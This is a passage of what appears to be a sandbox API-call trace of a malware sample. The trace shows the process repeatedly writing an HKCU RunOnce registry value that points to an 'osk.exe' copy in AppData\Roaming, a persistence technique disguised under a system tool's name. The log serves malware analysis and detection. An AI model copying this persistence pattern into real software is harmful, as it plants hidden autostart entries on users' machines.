[6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.268] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0081.268] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.268] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2c [0081.268] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.268] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0081.269] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.269] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.269] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.269] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.269] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.269] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.269] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.269] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.269] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.269] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.269] RegCloseKey (hKey=0x280) returned 0x0 [0081.269] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.269] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.270] SetTimer (hWnd=0x20280, nIDEvent=0x20a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a7 [0081.270] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.281] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.282] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.282] KillTimer (hWnd=0x20280, uIDEvent=0x20a7) returned 1 [0081.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.282] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.282] IUnknown:Release (This=0x787518) returned 0x1 [0081.282] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.282] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.282] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.283] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.283] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0081.283] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.283] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2d [0081.283] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.284] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0081.284] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.284] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.284] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.284] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.284] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.284] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.284] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.284] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.285] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.285] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.285] RegCloseKey (hKey=0x280) returned 0x0 [0081.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.285] SetTimer (hWnd=0x20280, nIDEvent=0x20a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a8 [0081.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.297] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.297] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.297] KillTimer (hWnd=0x20280, uIDEvent=0x20a8) returned 1 [0081.297] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.297] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.298] IUnknown:Release (This=0x787518) returned 0x1 [0081.298] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.298] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.298] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.298] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0081.298] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.298] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2e [0081.298] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.299] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0081.299] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.299] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.299] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.299] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.299] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.300] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.300] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.300] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.300] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.300] RegCloseKey (hKey=0x280) returned 0x0 [0081.300] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.300] SetTimer (hWnd=0x20280, nIDEvent=0x20a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a9 [0081.300] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.313] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.313] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.313] KillTimer (hWnd=0x20280, uIDEvent=0x20a9) returned 1 [0081.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.313] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.313] IUnknown:Release (This=0x787518) returned 0x1 [0081.313] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.313] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.313] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.314] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, 